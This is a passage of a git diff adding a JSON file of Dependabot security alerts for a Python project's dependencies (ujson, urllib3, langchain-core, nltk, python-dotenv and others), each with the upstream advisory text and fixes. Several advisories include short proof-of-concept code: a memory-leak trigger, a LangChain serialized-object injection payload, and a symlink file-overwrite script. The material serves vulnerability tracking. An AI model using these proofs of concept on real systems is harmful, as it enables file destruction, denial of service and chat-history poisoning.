diff --git a/.planning/dependabot-alerts.json b/.planning/dependabot-alerts.json new file mode 100644 index 00000000..2479215e --- /dev/null +++ b/.planning/dependabot-alerts.json 
@@ -0,0 +1 @@ +[{"number":127,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"ujson"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-c38f-wx89-p2xg","cve_id":"CVE-2026-44660","summary":"UltraJSON has a Memory Leak in ujson.dump() on Write Failure","description":"### Summary\n\nWhen `ujson.dump()` writes to a file-like object and the write operation raises an exception, the serialized JSON string object is not decremented, leaking memory. Each failed write operation leaks the full size of the serialized payload.\n\nCode that uses `ujson.dumps()` rather than `ujson.dump()` or only JSON load/decode methods is unaffected.\n\n### Details\n\n**Vulnerability Location:**\n- `src/ujson/python/objToJSON.c:913` - `objToJSONFile()` function start\n- `src/ujson/python/objToJSON.c:931` - Error return on write failure\n- `src/ujson/python/objToJSON.c:942` - Early return without cleanup\n \n**Root Cause:**\n\nThe `objToJSONFile()` function allocates a Python string object via `ujson_dumps_internal()`, calls the file's `write()` method, and returns early if `write()` raises an exception—but never calls `Py_DECREF(string)` on the early exit path.\n\n### PoC\n```python\nimport gc, tracemalloc, ujson\n\nclass BadFile:\n def write(self, s):\n raise RuntimeError(\"boom\")\n\nobj = {\"x\": \"A\" * 200000}\n\ndef run():\n try:\n ujson.dump(obj, BadFile())\n except RuntimeError:\n pass\n\nrun()\ntracemalloc.start()\ngc.collect()\nbase = tracemalloc.get_traced_memory()[0]\n\nfor i in range(5):\n run()\n gc.collect()\n cur = tracemalloc.get_traced_memory()[0]\n print(i, cur - base)\n```\n\n### Impact\n\nAny application that serializes data through `ujson.dump()` to an attacker-influenced file-like object that can fail can be driven into linear memory growth. 
An attacker can quickly use up all the memory of say a web server that sends JSON responses using `ujson.dump()` by repeatedly making requests then closing the connection mid response.\n\n### Remediation\n\nThe missing dec-refs were added in 82af1d0ac01d09aa40c887b460d44b9d9f4bccd9. We recommend upgrading to [UltraJSON 5.12.1](https://github.com/ultrajson/ultrajson/releases/tag/5.12.1).\n\n### Workarounds\n\nReplacing `ujson.dump(obj, file)` with `file.write(ujson.dumps(obj))` is equivalent (contrary to popular misconception, there are no streaming benefits to using `ujson.dump()`) and will avoid the memory leak.","severity":"high","identifiers":[{"value":"GHSA-c38f-wx89-p2xg","type":"GHSA"},{"value":"CVE-2026-44660","type":"CVE"}],"references":[{"url":"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-c38f-wx89-p2xg"},{"url":"https://github.com/ultrajson/ultrajson/commit/82af1d0ac01d09aa40c887b460d44b9d9f4bccd9"},{"url":"https://github.com/ultrajson/ultrajson/releases/tag/5.12.1"},{"url":"https://github.com/advisories/GHSA-c38f-wx89-p2xg"}],"published_at":"2026-05-12T22:25:11Z","updated_at":"2026-05-12T22:25:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":"<= 5.12.0","first_patched_version":{"identifier":"5.12.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","score":8.7}},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-401","name":"Missing Release of Memory after Effective Lifetime"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":"<= 
5.12.0","first_patched_version":{"identifier":"5.12.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/127","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/127","created_at":"2026-05-13T05:27:19Z","updated_at":"2026-05-13T05:27:19Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":126,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-qccp-gfcp-xxvc","cve_id":"CVE-2026-44431","summary":"urllib3: Sensitive headers forwarded across origins in proxied low-level redirects","description":"### Impact\n\nWhen following cross-origin redirects for requests made using urllib3’s high-level APIs, such as `urllib3.request()`, `PoolManager.request()`, and `ProxyManager.request()`, sensitive headers — `Authorization`, `Cookie`, and `Proxy-Authorization` (defined in `Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT`) — are stripped by default, as expected.\n\nHowever, cross-origin redirects followed from the low-level API via `ProxyManager.connection_from_url().urlopen(..., assert_same_host=False)` still forward these sensitive headers.\n\n### Affected usage\n\nApplications and libraries using urllib3 versions earlier than 2.7.0 may be affected if they allow cross-origin redirects while making requests through `HTTPConnection.urlopen()` instances created via `ProxyManager.connection_from_url()`.\n\n### Remediation\n\nUpgrade to urllib3 version 2.7.0 or later, in which sensitive headers are stripped from redirects followed by `HTTPConnection`.\n\nIf upgrading is not immediately possible, avoid using this low-level redirect flow for cross-origin redirects. 
If appropriate for your use case, switch to `ProxyManager.request()`.","severity":"high","identifiers":[{"value":"GHSA-qccp-gfcp-xxvc","type":"GHSA"},{"value":"CVE-2026-44431","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"},{"url":"https://github.com/advisories/GHSA-qccp-gfcp-xxvc"}],"published_at":"2026-05-11T14:51:20Z","updated_at":"2026-05-11T14:51:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.23, < 2.7.0","first_patched_version":{"identifier":"2.7.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N","score":8.2}},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-200","name":"Exposure of Sensitive Information to an Unauthorized Actor"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.23, < 2.7.0","first_patched_version":{"identifier":"2.7.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/126","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/126","created_at":"2026-05-13T05:27:19Z","updated_at":"2026-05-13T05:27:19Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":125,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-pjwx-r37v-7724","cve_id":"CVE-2026-44843","summary":"LangChain vulnerable to unsafe deserialization of attacker-controlled objects through overly broad `load()` allowlists","description":"LangChain contains older runtime code paths that 
deserialize run inputs, run outputs, or other application-controlled payloads using overly broad object allowlists. These paths may call `load()` with `allowed_objects=\"all\"`. This does not enable arbitrary Python object deserialization, but it does allow any trusted LangChain-serializable object to be revived, which is broader than these runtime paths require. As a result, attacker-supplied LangChain serialized constructor dictionaries may cause trusted runtime paths to instantiate classes with untrusted constructor arguments.\n\nApplications are exposed only when all of the following are true:\n\n1. The application accepts untrusted structured input, such as JSON, from a user or network request.\n2. The application does not validate or canonicalize that input into an inert schema before invoking LangChain.\n3. Attacker-controlled nested dictionaries or lists are preserved in LangChain run inputs or outputs.\n4. The application uses an affected API path that later deserializes that run data.\n\nKnown affected runtime surfaces include:\n\n- `RunnableWithMessageHistory`\n- `astream_log()`\n- `astream_events(version=\"v1\")`\n\nRelated unsafe deserialization patterns may also affect applications that explicitly load serialized LangChain prompt or runnable objects from untrusted sources, including shared prompt stores, Hub artifacts with model configuration, or other application-controlled serialization stores.\n\nApplications that validate incoming requests against a fixed schema, such as coercing user input to a plain string or message-content field before invoking LangChain, are unlikely to expose this deserialization primitive.\n\nThis release also fixes a related secret-marker validation bypass in the serialization and deserialization layer (`_is_lc_secret`). 
That issue creates an additional path by which attacker-controlled constructor dictionaries can avoid escaping during `dumps()` -> `loads()` round-trips and reach LangChain object revival logic.\n\n## Impact\n\nAn attacker who can submit untrusted structured input to an affected application, and have that structure preserved in LangChain run data, may be able to inject LangChain serialized constructor payloads such as:\n\n```json\n{\n \"lc\": 1,\n \"type\": \"constructor\",\n \"id\": [\"langchain_core\", \"messages\", \"ai\", \"AIMessage\"],\n \"kwargs\": {\"content\": \"attacker-controlled content\"}\n}\n```\n\nIf this payload reaches a broad `load()` call, LangChain may instantiate the referenced class instead of treating the payload as inert user data.\n\nRealistic impacts include:\n\n- Persistent chat-history poisoning when revived `AIMessage`, `HumanMessage`, or `SystemMessage` objects are stored by `RunnableWithMessageHistory`.\n- Prompt injection or behavior manipulation if attacker-controlled messages are later included in model context.\n- Instantiation of unexpected trusted LangChain objects with attacker-controlled constructor arguments.\n- Possible credential disclosure or server-side requests if a reachable object reads environment credentials, creates clients, or contacts attacker-controlled endpoints during initialization.\n- Additional prompt-template or runnable-configuration impacts in applications that separately load and execute untrusted serialized LangChain objects.\n\n## Remediation\n\nLangChain will deprecate the affected APIs as part of this fix:\n\n- `RunnableWithMessageHistory`\n- `astream_log()`\n- `astream_events(version=\"v1\")`\n\nThese are older code paths that are no longer recommended for new applications. They were not previously marked as deprecated, but recent LangChain documentation has primarily directed users toward newer streaming and memory patterns, including the `stream` API. 
Applications should migrate to the currently recommended APIs rather than continue depending on these older surfaces.\n\nSeparately, LangChain will update `load()` and `loads()` to tighten deserialization behavior so broad object revival is not applied implicitly to untrusted or application-controlled payloads. The older runtime surfaces listed above are being deprecated rather than preserved as supported paths for broad runtime deserialization.\n\nThis release also fixes a related secret-marker validation bypass in the serialization and deserialization layer (`_is_lc_secret`). That issue creates an additional path by which attacker-controlled constructor dictionaries can avoid escaping during `dumps()` -> `loads()` round-trips and reach LangChain object revival logic.\n\n## Guidance for `load()` and `loads()`\n\n`load()` and `loads()` should be used only with trusted LangChain manifests or serialized objects from trusted storage. Do not pass user-controlled data to `load()` or `loads()`, and do not use them as general parsers for request bodies, tool inputs, chat messages, or other attacker-controlled data.\n\n`load()` and `loads()` are beta APIs, and their behavior may change as LangChain narrows unsafe defaults. Future LangChain versions will require callers to be explicit about which objects may be revived. 
Users should pass a narrow `allowed_objects` value appropriate for the specific trusted manifest they are loading, rather than relying on broad defaults or `allowed_objects=\"all\"`, which permits the full trusted LangChain serialization allowlist.\n\n## Credits\n\nThe original issue was first reported by @u-ktdi.\n\nSimilar findings were reported by @dewankpant, @shrutilohani, @Moaaz-0x, @pucagit.\n\nA related `_is_lc_secret` marker bypass affecting `dumps()` -> `loads()` round-trips was reported by @yardenporat353 (and a similar report by @localhost-detect)","severity":"high","identifiers":[{"value":"GHSA-pjwx-r37v-7724","type":"GHSA"},{"value":"CVE-2026-44843","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-pjwx-r37v-7724"},{"url":"https://github.com/advisories/GHSA-pjwx-r37v-7724"}],"published_at":"2026-05-08T23:07:32Z","updated_at":"2026-05-08T23:07:34Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":">= 1.0.0, <= 1.3.2","first_patched_version":{"identifier":"1.3.3"}},{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":"<= 0.3.84","first_patched_version":{"identifier":"0.3.85"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N","score":8.2},"cvss_v4":{"vector_string":null,"score":0.0}},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N","score":8.2},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":">= 1.0.0, <= 
1.3.2","first_patched_version":{"identifier":"1.3.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/125","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/125","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":124,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"mem0ai"},"manifest_path":"methods/EverCore/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-xqxw-r767-67m7","cve_id":"CVE-2026-7597","summary":"mem0ai mem0 has an Improper Input Validation Issue","description":"A vulnerability was found in mem0ai mem0 up to 1.0.11. This affects the function pickle.load/pickle.dump of the file mem0/vector_stores/faiss.py. Performing a manipulation results in deserialization. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The patch is named 62dca096f9236010ca15fea9ba369ba740b86b7a. 
Applying a patch is the recommended action to fix this issue.","severity":"low","identifiers":[{"value":"GHSA-xqxw-r767-67m7","type":"GHSA"},{"value":"CVE-2026-7597","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-7597"},{"url":"https://github.com/mem0ai/mem0/issues/3778"},{"url":"https://github.com/mem0ai/mem0/pull/4833"},{"url":"https://github.com/mem0ai/mem0/commit/62dca096f9236010ca15fea9ba369ba740b86b7a"},{"url":"https://github.com/mem0ai/mem0"},{"url":"https://vuldb.com/submit/805562"},{"url":"https://vuldb.com/vuln/360550"},{"url":"https://vuldb.com/vuln/360550/cti"},{"url":"https://github.com/advisories/GHSA-xqxw-r767-67m7"}],"published_at":"2026-05-02T00:31:21Z","updated_at":"2026-05-07T20:47:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"mem0ai"},"severity":"low","vulnerable_version_range":"< 2.0.0b2","first_patched_version":{"identifier":"2.0.0b2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L","score":6.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P","score":2.1}},"epss":{"percentage":0.00058,"percentile":0.17791},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L","score":6.3},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"mem0ai"},"severity":"low","vulnerable_version_range":"< 
2.0.0b2","first_patched_version":{"identifier":"2.0.0b2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/124","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/124","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":123,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"python-multipart"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-pp6c-gr5w-3c5g","cve_id":"CVE-2026-42561","summary":"python-multipart has Denial of Service via unbounded multipart part headers","description":"### Summary\n\n`python-multipart` has a denial of service vulnerability in multipart part header parsing. When parsing `multipart/form-data`, `MultipartParser` previously had no limit on the number of part headers or the size of an individual part header. An attacker could send a request with either many repeated headers without terminating the header block or a single very large header value, causing excessive CPU work before request rejection or completion.\n\n### Impact\n\nApplications that parse attacker-controlled `multipart/form-data` with affected versions of `python-multipart` can experience CPU exhaustion. ASGI applications using Starlette, FastAPI, or other frameworks that invoke `python-multipart` may have worker or event-loop delays while processing malicious upload requests.\n\n### Details\n\nThe affected parser states are `HEADER_FIELD_START`, `HEADER_FIELD`, `HEADER_VALUE_START`, `HEADER_VALUE`, and `HEADER_VALUE_ALMOST_DONE`. 
The issue can be triggered by:\n\n- A multipart part with an oversized individual header value.\n- A multipart part with many repeated header lines or an unterminated header block.\n\nBoth variants are addressed by enforcing default parser limits for maximum header count and maximum header size.\n\n### Mitigation\n\nUpgrade to `python-multipart` `0.0.27` or later.\n\nIf upgrading is not immediately possible, reduce exposure by enforcing request body size limits at the server, proxy, or framework layer. This is only a mitigation; affected versions of `python-multipart` still parse multipart part headers without the default header count and header size limits.","severity":"high","identifiers":[{"value":"GHSA-pp6c-gr5w-3c5g","type":"GHSA"},{"value":"CVE-2026-42561","type":"CVE"}],"references":[{"url":"https://github.com/Kludex/python-multipart/security/advisories/GHSA-pp6c-gr5w-3c5g"},{"url":"https://github.com/advisories/GHSA-pp6c-gr5w-3c5g"}],"published_at":"2026-05-06T21:56:14Z","updated_at":"2026-05-06T21:56:16Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 0.0.27","first_patched_version":{"identifier":"0.0.27"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 
0.0.27","first_patched_version":{"identifier":"0.0.27"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/123","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/123","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":122,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-68j8-pq59-fqgm","cve_id":"CVE-2026-0847","summary":"NLTK has a Path Traversal issue","description":"A vulnerability in NLTK versions up to and including 3.9.2 allows arbitrary file read via path traversal in multiple CorpusReader classes, including WordListCorpusReader, TaggedCorpusReader, and BracketParseCorpusReader. These classes fail to properly sanitize or validate file paths, enabling attackers to traverse directories and access sensitive files on the server. This issue is particularly critical in scenarios where user-controlled file inputs are processed, such as in machine learning APIs, chatbots, or NLP pipelines. 
Exploitation of this vulnerability can lead to unauthorized access to sensitive files, including system files, SSH private keys, and API tokens, and may potentially escalate to remote code execution when combined with other vulnerabilities.","severity":"high","identifiers":[{"value":"GHSA-68j8-pq59-fqgm","type":"GHSA"},{"value":"CVE-2026-0847","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-0847"},{"url":"https://huntr.com/bounties/fc69914f-36a9-4c18-8503-10013b39f966"},{"url":"https://github.com/advisories/GHSA-68j8-pq59-fqgm"}],"published_at":"2026-03-04T21:32:45Z","updated_at":"2026-05-06T19:18:18Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.2","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.0008,"percentile":0.23316},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 
3.9.2","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/122","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/122","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":121,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"python-dotenv"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mf9w-mj56-hr94","cve_id":"CVE-2026-28684","summary":"python-dotenv: Symlink following in set_key allows arbitrary file overwrite via cross-device rename fallback","description":"### Summary\n\n`set_key()` and `unset_key()` in python-dotenv follow symbolic links when rewriting `.env` files, allowing a local attacker to overwrite arbitrary files via a crafted symlink when a cross-device rename fallback is triggered.\n\n\n### Details\n\nThe `rewrite()` context manager in `dotenv/main.py` is used by both `set_key()` and `unset_key()` to safely modify `.env` files. It works by writing to a temporary file (created in the system's default temp directory, typically `/tmp`) and then using `shutil.move()` to replace the original file.\n\nWhen the `.env` path is a symbolic link and the temp directory resides on a different filesystem than the target (a common configuration on Linux systems using tmpfs for `/tmp`), the following sequence occurs:\n\n1. `shutil.move()` first attempts `os.rename()`, which fails with an `OSError` because atomic renames cannot cross device boundaries.\n2. On failure, `shutil.move()` falls back to `shutil.copy2()` followed by `os.unlink()`.\n3. `shutil.copy2()` calls `shutil.copyfile()` with `follow_symlinks=True` by default.\n4. 
This causes the content to be written to the **symlink target** rather than replacing the symlink itself.\n\nAn attacker who has write access to the directory containing a `.env` file can pre-place a symlink pointing to any file that the application process has write access to. When the application (or a privileged process such as a deploy script, Docker entrypoint, or CI pipeline) calls `set_key()` or `unset_key()`, the symlink target is overwritten with the new `.env` content.\n\nThis vulnerability does not require a race condition and is fully deterministic once the preconditions are met.\n\n### Impact\nThe primary impacts are to **integrity** and **availability**:\n\n- **File overwrite / destruction (DoS):** An attacker can cause an application or privileged process to corrupt or destroy configuration files, database configs, or other sensitive files it would not normally have access to modify.\n- **Integrity violation:** The target file's original content is replaced with `.env`-formatted content controlled by the attacker.\n- **Potential privilege escalation:** In scenarios where a privileged process (running as root or a service account) calls `set_key()`, the attacker can leverage this to write to files beyond their own access level.\n\nThe scope of impact depends on the application using python-dotenv and the privileges under which it runs.\n\n\n### Proof of Concept\n\nThe following script demonstrates the vulnerability. 
It requires `/tmp` and the user's home directory to reside on different devices (common on systemd-based Linux systems with tmpfs).\n\n```python\nimport os\nimport sys\nimport tempfile\nfrom dotenv import set_key\n\n# Pre-condition: /tmp must be on a different device than the target directory.\ntmp_dev = os.stat(\"/tmp\").st_dev\nhome_dev = os.stat(os.path.expanduser(\"~\")).st_dev\nassert tmp_dev != home_dev, \"Skipped: /tmp and ~ are on the same device (no cross-device move)\"\n\nwith tempfile.TemporaryDirectory(dir=os.path.expanduser(\"~\")) as workdir:\n # File an attacker wants to overwrite\n target = os.path.join(workdir, \"victim_config.txt\")\n with open(target, \"w\") as f:\n f.write(\"DB_PASSWORD=supersecret\\n\")\n\n # Attacker pre-places a symlink at the path the application will use as .env\n env_symlink = os.path.join(workdir, \".env\")\n os.symlink(target, env_symlink)\n\n before = open(target).read()\n\n # Application writes a new key -- triggers the cross-device fallback\n set_key(env_symlink, \"INJECTED\", \"attacker_value\")\n\n after = open(target).read()\n\n print(\"Before:\", repr(before))\n print(\"After: \", repr(after))\n print(\"Symlink target overwritten:\", target)\n```\n\n**Expected output:**\n```\nBefore: 'DB_PASSWORD=supersecret\\n'\nAfter: \"DB_PASSWORD=supersecret\\nINJECTED='attacker_value'\\n\"\nSymlink target overwritten: /home/user/tmp806nut2g/victim_config.txt\n```\n\n### Remediation\n\nThe fix changes the `rewrite()` context manager in the following ways:\n\n1. **Symlinks are no longer followed by default.** When the `.env` path is a symlink, `rewrite()` now resolves it to the real path before proceeding, or (by default) operates on the symlink entry itself rather than the target.\n2. **A `follow_symlinks: bool = False` parameter** is added to `set_key()` and `unset_key()` for users who explicitly need the old behavior.\n3. 
**Temp files are written in the same directory** as the target `.env` file (instead of the system temp directory), eliminating the cross-device rename condition entirely.\n4. **`os.replace()` is used instead of `shutil.move()`**, providing atomic replacement without symlink-following fallback behavior.\n\nUsers are advised to upgrade to the patched version as soon as it is available on PyPI.\n\n### Timeline\n\n| Date | Event |\n| ------------ | ---------------------------------------------------------------------------------------------------- |\n| 2026-01-09 | Initial report received from Giorgos Tsigourakos regarding a separate, unrelated issue also located in `rewrite()` |\n| 2026-01-10 | Co-maintainer acknowledged report, requested clarification |\n| 2026-01-11 | Initial report assessed as not exploitable and closed |\n| 2026-02-24 | Reporter identified new, distinct cross-device symlink attack vector with deterministic exploitation |\n| 2026-02-26 | Co-maintainer confirmed vulnerability and shared draft patch |\n| 2026-02-26 | Reporter validated fix with monkeypatched PoC, proposed CVSS |\n| 2026-03-01 | Patch merged to main |\n| 2026-03-01 | Patched version released to PyPI |\n| 2026-04-20 | Advisory published |\n\n### Patches\n\nUpgrade to v.1.2.2 or use the patch from 
https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311.patch","severity":"medium","identifiers":[{"value":"GHSA-mf9w-mj56-hr94","type":"GHSA"},{"value":"CVE-2026-28684","type":"CVE"}],"references":[{"url":"https://github.com/theskumar/python-dotenv/security/advisories/GHSA-mf9w-mj56-hr94"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28684"},{"url":"https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311"},{"url":"https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311.patch"},{"url":"https://github.com/theskumar/python-dotenv/releases/tag/v1.2.2"},{"url":"https://github.com/advisories/GHSA-mf9w-mj56-hr94"}],"published_at":"2026-04-21T14:38:57Z","updated_at":"2026-04-21T14:38:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-dotenv"},"severity":"medium","vulnerable_version_range":"< 1.2.2","first_patched_version":{"identifier":"1.2.2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H","score":6.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.0001,"percentile":0.01226},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H","score":6.6},"cwes":[{"cwe_id":"CWE-59","name":"Improper Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-61","name":"UNIX Symbolic Link (Symlink) Following"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-dotenv"},"severity":"medium","vulnerable_version_range":"< 
1.2.2","first_patched_version":{"identifier":"1.2.2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/121","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/121","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":120,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-h8wq-7xc4-p3qx","cve_id":"CVE-2026-0846","summary":"NLTK has Arbitrary File Read via Absolute Path Input in nltk.util.filestring()","description":"A vulnerability in the `filestring()` function of the `nltk.util` module in nltk version 3.9.2 allows arbitrary file read due to improper validation of input paths. The function directly opens files specified by user input without sanitization, enabling attackers to access sensitive system files by providing absolute paths or traversal paths. 
This vulnerability can be exploited locally or remotely, particularly in scenarios where the function is used in web APIs or other interfaces that accept user-supplied input.","severity":"high","identifiers":[{"value":"GHSA-h8wq-7xc4-p3qx","type":"GHSA"},{"value":"CVE-2026-0846","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-0846"},{"url":"https://huntr.com/bounties/007b84f8-418e-4300-99d0-bf504c2f97eb"},{"url":"https://github.com/nltk/nltk/pull/3485"},{"url":"https://github.com/nltk/nltk/commit/b2e1164bf89277f79b65406c829b99fb20ca1974"},{"url":"https://github.com/advisories/GHSA-h8wq-7xc4-p3qx"}],"published_at":"2026-03-09T21:31:38Z","updated_at":"2026-04-18T01:14:19Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"< 